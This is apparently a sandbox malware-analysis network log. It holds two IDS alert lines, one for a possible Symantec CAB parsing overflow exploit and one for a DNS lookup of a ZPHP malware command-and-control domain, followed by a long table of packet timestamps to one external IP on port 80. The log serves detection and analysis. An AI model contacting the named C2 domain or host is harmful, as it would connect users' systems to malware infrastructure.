2024-07-16T22:30:43.615970+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 52098 | 20.12.23.50 | 192.168.2.4
2024-07-16T22:29:48.775589+0200 | UDP | 2054426 | ET MALWARE ZPHP CnC Domain in DNS Lookup (dfwreds .com) | 58012 | 53 | 192.168.2.4 | 1.1.1.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Jul 16, 2024 22:29:49.656399012 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.656431913 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656465054 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656477928 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.656523943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656558037 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656575918 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.656590939 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656622887 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656636953 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.656656981 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656691074 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656701088 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.656974077 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657026052 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.657180071 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657212973 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657246113 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657262087 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.657279968 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657313108 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657331944 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.657351017 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657385111 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657401085 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.657419920 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657453060 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657466888 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.657485008 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657519102 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657530069 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.657552958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657596111 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.658049107 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658098936 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658149958 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.658152103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658185959 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658220053 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658231974 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.658252954 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658286095 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658302069 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.658319950 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658353090 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658366919 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.658385992 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658421040 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658437014 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.658461094 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658508062 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.659270048 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.659307003 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.659339905 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.659357071 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.659373999 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.659429073 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.695075035 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.695146084 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.695162058 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.695231915 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.743467093 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.743510962 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.743566036 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.743599892 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.743633032 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.743670940 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.743694067 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.743798018 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.743824959 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.743875980 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.743913889 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.743947983 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.743979931 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.743994951 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.744014025 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744059086 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.744066954 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744100094 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744132996 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744153976 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.744164944 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744199038 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744210958 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.744232893 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744265079 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744277954 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.744298935 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744345903 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.744550943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744582891 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744616032 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744632006 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.744651079 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744683981 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744695902 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.744716883 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744750023 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744780064 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.744806051 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.744853020 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.745119095 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745151043 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745184898 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745197058 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.745219946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745265961 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.745469093 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745501995 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745534897 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745547056 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.745568991 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745600939 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745615005 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.745635986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745668888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745688915 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.745701075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745733976 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745748997 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.745765924 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745799065 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745831013 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.745831013 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745867014 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.745879889 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.746465921 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746499062 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746519089 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.746531010 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746563911 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746597052 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746601105 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.746629000 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746659040 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.746701002 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746733904 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746757984 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.746767044 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746799946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746813059 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.746834040 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746865988 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746879101 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.746898890 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.746946096 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.747492075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.747525930 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.747559071 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.747580051 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.747591019 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.747622967 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.747644901 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.747657061 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.747689962 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.747699976 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.747725964 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.747773886 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.748712063 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.748804092 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.748838902 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.748863935 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.748960972 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.748994112 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749006987 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.749027014 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749062061 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749073982 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.749140978 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749176025 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749188900 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.749254942 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749300957 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.749304056 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749336958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749368906 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749381065 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.749402046 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749445915 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.749526024 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749558926 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749593019 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749604940 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.749625921 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749660015 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749670982 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.749866009 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749901056 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749922991 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.749933004 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749965906 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.749975920 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.749999046 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.750041008 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.750207901 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.927637100 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.928018093 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928050995 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928066969 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.928102016 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928134918 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928153992 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.928167105 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928200006 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928212881 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.928232908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928265095 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928280115 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.928298950 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928330898 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928345919 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.928364992 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928396940 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928412914 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.928431034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928488016 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.928849936 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928884029 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928916931 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.928932905 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.928968906 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929002047 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929018974 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.929034948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929068089 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929083109 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.929101944 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929133892 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929147959 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.929166079 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929199934 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929214954 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.929233074 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929265976 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929280043 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.929300070 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929346085 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.929927111 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929960966 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.929994106 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930008888 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.930027008 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930059910 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930072069 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.930094004 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930125952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930140972 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.930160046 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930192947 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930207014 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.930226088 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930259943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930275917 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.930298090 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930331945 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930345058 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.930365086 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930409908 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.930780888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930830002 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930862904 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930875063 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.930897951 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930931091 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930948973 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.930963993 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.930996895 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931010008 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.931030989 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931063890 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931078911 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.931097031 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931129932 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931144953 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.931163073 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931195974 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931210041 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.931229115 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931277990 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.931653023 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931685925 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931727886 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.931735992 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931768894 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931802034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931818008 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.931834936 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931869030 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931879044 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.931904078 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931936026 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.931952000 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.931969881 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.932003975 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.932019949 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.932035923 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.932069063 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.932084084 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.932616949 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.932651043 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.932683945 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.932709932 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.932746887 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.932758093 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.932780981 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.932813883 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.932826042 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.932847977 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.932890892 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.932890892 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.978501081 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.016509056 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.016596079 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.016628981 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.016659021 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.016680956 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.016716003 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.016732931 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.016748905 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.016782045 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.016791105 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.016814947 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.016856909 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.016865969 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.016899109 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.016932011 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.016941071 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.016963005 CEST804973023.227.193.59192.168.2.4
